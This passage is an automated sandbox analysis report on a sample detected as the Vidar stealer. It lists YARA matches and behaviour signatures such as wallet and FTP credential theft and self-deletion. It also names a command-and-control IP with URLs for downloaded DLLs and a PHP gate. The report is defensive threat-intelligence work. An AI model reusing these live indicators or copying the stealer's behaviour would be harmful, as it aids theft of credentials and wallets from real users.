Yara detected Vidar stealer
Source: Yara match File source: Vk2yYa9dHl.exe, type: SAMPLE
Source: Yara match File source: 0.2.Vk2yYa9dHl.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.Vk2yYa9dHl.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1753531870.0000000000051000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1633713421.0000000000051000.00000080.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Vk2yYa9dHl.exe PID: 7292, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CEB0C40 sqlite3_bind_zeroblob, 0_2_6CEB0C40
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CEB0D60 sqlite3_bind_parameter_name, 0_2_6CEB0D60
Source: C:\Users\user\Desktop\Vk2yYa9dHl.exe Code function: 0_2_6CDD8EA0 sqlite3_clear_bindings, 0_2_6CDD8EA0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1430617 Sample: Vk2yYa9dHl.exe Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 28 Snort IDS alert for network traffic 2->28 30 Found malware configuration 2->30 32 Antivirus / Scanner detection for submitted sample 2->32 34 8 other signatures 2->34 7 Vk2yYa9dHl.exe 32 2->7         started        process3 dnsIp4 26 89.105.198.253, 49730, 80 NOVOSERVE-ASNL Netherlands 7->26 18 C:\ProgramData\nss3.dll, PE32 7->18 dropped 20 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 7->20 dropped 22 C:\Users\user\AppData\...\softokn3[1].dll, PE32 7->22 dropped 24 9 other files (none is malicious) 7->24 dropped 36 Found many strings related to Crypto-Wallets (likely being stolen) 7->36 38 Self deletion via cmd or bat file 7->38 40 Tries to harvest and steal ftp login credentials 7->40 42 5 other signatures 7->42 12 cmd.exe 1 7->12         started        file5 signatures6 process7 process8 14 conhost.exe 12->14         started        16 timeout.exe 1 12->16         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
89.105.198.253
 unknown Netherlands
24875 NOVOSERVE-ASNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://89.105.198.253/a50c1b38c13f8f79/nss3.dll true
  • Avira URL Cloud: safe
 unknown
http://89.105.198.253/a50c1b38c13f8f79/softokn3.dll true
  • Avira URL Cloud: safe
 unknown
http://89.105.198.253/a50c1b38c13f8f79/freebl3.dll true
  • Avira URL Cloud: safe
 unknown
89.105.198.253/300e6d86f44da037.php true
  • Avira URL Cloud: safe
 low
http://89.105.198.253/300e6d86f44da037.php true
  • Avira URL Cloud: safe
 unknown
http://89.105.198.253/a50c1b38c13f8f79/sqlite3.dll true
  • Avira URL Cloud: safe
 unknown
http://89.105.198.253/a50c1b38c13f8f79/mozglue.dll true
  • Avira URL Cloud: safe
 unknown
http://89.105.198.253/a50c1b38c13f8f79/msvcp140.dll true
  • Avira URL Cloud: safe
 unknown
http://89.105.198.253/a50c1b38c13f8f79/vcruntime140.dll true
  • Avira URL Cloud: safe
 unknown